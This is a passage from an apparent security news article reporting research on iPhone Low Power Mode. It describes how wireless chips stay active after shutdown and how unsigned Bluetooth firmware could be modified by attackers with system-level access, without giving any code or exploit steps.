The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM,” the researchers said.
The Low-Power Mode was implements with iOS 15, it is supported by iPhone 11, iPhone 12, and iPhone 13 devices.
Many users are not aware of these features, even if they are aware that their iPhone remains locable even when the device was turned off.
The experts mentioned the case of a user-initiated shutdown during which the iPhone remains locatable via the Find My network.
The researchers focused their analysis on how Apple implements standalone wireless features while the iOS is not running, they also discovered that the wireless chips have direct access to the secure element.
“LPM [Low Power Mode] support is implemented in hardware. The Power Management Unit (PMU) can turn on chips individually. The Bluetooth and UWB chips are hardwired to the Secure Element (SE) in the NFC chip, storing secrets that should be available in LPM. Since LPM support is implemented in hardware, it cannot be removed by changing software components.” reads the paper published by the researchers. “As a result, on modern iPhones, wireless chips can no longer be trusted to be turned off after shutdown. This poses a new threat model. Previous work only considered that journalists are not safe against espionage when enabling airplane mode in case their smartphones were compromised”
The experts explained that a threat actor has different options to tamper with firmware, which depend on their preconditions. Unlike NFC and UWB chips, the Bluetooth firmware is neither signed nor encrypted opening the doors to modification.
An attacker with privileged access can exploit this bug to develop a malware that can run on an iPhone Bluetooth chip even when it is off.
“The current LPM implementation on Apple iPhones is opaque and adds new threats. Since LPM support is based on the iPhone’s hardware, it cannot be removed with system updates. Thus, it has a long-lasting effect on the overall iOS security model.” concludes the paper. “To the best of our knowledge, we are the first who looked into undocumented LPM features introduced in iOS 15 and uncover various issues. Design of LPM features seems to be mostly driven by functionality, without considering threats outside of the intended applications. Find My after power off turns shutdown iPhones into tracking devices by design, and the implementation within the Bluetooth firmware is not secured against manipulation. Tracking properties could stealthily be changed by attackers with system-level access.”
The researchers will present the results of their study at the ACM Conference on Security and Privacy in Wireless and Mobile Networks (WiSec 2022).
